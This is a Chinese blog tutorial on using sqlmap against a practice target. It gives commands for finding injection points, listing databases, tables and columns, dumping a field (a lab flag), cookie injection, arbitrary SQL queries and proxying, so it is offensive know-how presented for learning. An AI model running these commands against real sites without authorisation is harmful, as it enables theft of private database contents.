• 【SQLMAP】02 实战


    一、常用命令
    检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 
    列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 
    指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 
    指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
    指定数据库名表名字段dump出指定字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump 
    cookie 注入      --cookie=COOKIE                 在需要登录的地方,需要登录后的cookie 
    执行指定的 SQL 语句 --sql-query=QUERY 
    代理注入 --proxy="http://127.0.0.1:8087"
     
    二、找到目标数据的过程
    =>先确定数据在哪个数据库
    =>再确定是数据库中的哪一张表
    =>确定表里分别有哪些字段
    =>最后根据字段来取出指定数据
     
    三、实战
    1、检查注入点
    sqlmap -u "http://ooxx.com/a.php?id=1"
    (2)打开sqlmap的快捷方式
    (3)输入命令,检查注入点:
    python sqlmap.py -u "目标地址"
     
    2、列数据库信息
    sqlmap -u "http://ooxx.com/a.php?id=1" --dbs
    python sqlmap.py -u "目标地址" --dbs
     
    3、指定数据库名列出所有表
    sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables
    (1)拿到2、查询到的数据库名
    // information数据库是预设的数据库一般不在此处
    information_schema
    twosecu1_vuln_02
    (2)替换如下命令中的dbsname
    python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 --tables
    (3)结果
     
    4、指定 数据库名 表名,列出所有字段
    sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
    (1)拿到3、查询到的数据表名:book、hacker
    python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T book --columns
    python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker --columns
    (2)结果
     
    5、指定数据库名表名字段dump出指定字段
    sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump
    (1)拿到4、查询到的字段名diary、id(实际场景是破解日记中的内容,so选择diary)
    python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker -C diary --dump
    (2)原文件
    (3)通过sql注入查询到的文件
    (4)获得目标字段:XhacKer_d1aryX
    6、cookie 注入
    --cookie=COOKIE 在需要登录的地方,需要登录后的cookie 
    7、执行指定的 SQL 语句
    --sql-query=QUERY
    8、代理注入
    --proxy="http://127.0.0.1:8087"
    参考:
     https://zhishihezi.net/b/03c82a3d82cdf5a1d066e0e2423e48dd#start

  • 相关阅读:
    串口通信
    无法安装SQL提示文件被挂起
    flash图片幻灯片浏览
    document.all与WEB标准
    在新窗口中打开页面 的asp.net后台代码
    sql 触发器
    无技术含量的正则表达式笔记
    两个FTP服务器之间传送数据
    repeater嵌套
    登录
  • 原文地址:https://www.cnblogs.com/guoccf/p/14550629.html
Copyright © 2020-2023  润新知